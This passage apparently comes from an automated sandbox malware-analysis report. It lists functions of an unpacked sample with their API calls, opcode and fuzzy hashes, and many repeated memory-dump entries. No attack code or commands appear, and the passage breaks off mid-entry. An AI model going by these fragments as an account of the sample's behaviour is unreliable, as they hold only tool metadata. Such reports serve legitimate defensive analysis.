                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID: 89
                                                                                    • API String ID: 621844428-155395596
                                                                                    • Opcode ID: 5621d53140b63d19dec29a61b70669bb91d8332fc8622b3c17c90ed64173e2a0
                                                                                    • Instruction ID: 10e71ca47c59d4f8cacc576519b137cffec95307c5d268e21a377c0d544af225
                                                                                    • Opcode Fuzzy Hash: 5621d53140b63d19dec29a61b70669bb91d8332fc8622b3c17c90ed64173e2a0
                                                                                    • Instruction Fuzzy Hash: EB519C7275871057E318AA748C563BFABD2DF82314F198D2CD9C5EB3C1D96C8C098796
                                                                                    Function 0068D7F8 Relevance: 1.9, APIs: 1, Instructions: 413COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 461df7b4b0c0eed1a09554f362bc4594c0c08b1c7116d490a97a908435957736
                                                                                    • Instruction ID: 77cfb7f0d379d9f4dbf8b1e381f67fb9568f7f44fc0e1f084b81d95942757710
                                                                                    • Opcode Fuzzy Hash: 461df7b4b0c0eed1a09554f362bc4594c0c08b1c7116d490a97a908435957736
                                                                                    • Instruction Fuzzy Hash: 0ED100B55047418FDB249F28C881B63B7E3FF49314F188A6CD49A8B796E734E846CB61
                                                                                    Function 0068104F Relevance: 1.6, APIs: 1, Instructions: 379COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoUninitialize.COMBASE(?,00000001,00000001,?,?,?,00000001,00000001,00000003,00000001,00000001,?,?,?,00000001,00000001), ref: 00681379
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Uninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 3861434553-0
                                                                                    • Opcode ID: 0c20bfe077b679a383c1e9bbbf8ed5d29273e3eab86ab20af20857b6efc1e221
                                                                                    • Instruction ID: e89f407c1e82a85bcd3de18946669eb1ce1f9b31c4e332cbd5a36828e0bfcbbf
                                                                                    • Opcode Fuzzy Hash: 0c20bfe077b679a383c1e9bbbf8ed5d29273e3eab86ab20af20857b6efc1e221
                                                                                    • Instruction Fuzzy Hash: 51B13CB5A007404BD750AF309C9266B77E7AF95314F08993CE84B5B783EF39E8058766
                                                                                    Function 006AE210 Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 006AE2A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: d09253707835c903557682a8b2c63f6d6f0b4ed77ca0671c95d97ad6384692d6
                                                                                    • Instruction ID: f2f9a6306023decc5fddc0a9820838642e68143e47a6922690184c747bac79cf
                                                                                    • Opcode Fuzzy Hash: d09253707835c903557682a8b2c63f6d6f0b4ed77ca0671c95d97ad6384692d6
                                                                                    • Instruction Fuzzy Hash: F1114877E452508FC3108E68DCA1796BB5BEBD6711F2A053DD8845B680CA395816CB91
                                                                                    Function 006B0F10 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(006B46AD,005C003F,00000006,?,?,00000018,?,?,?), ref: 006B0F3E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                    • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                    • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                    • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                    Function 006B4C40 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
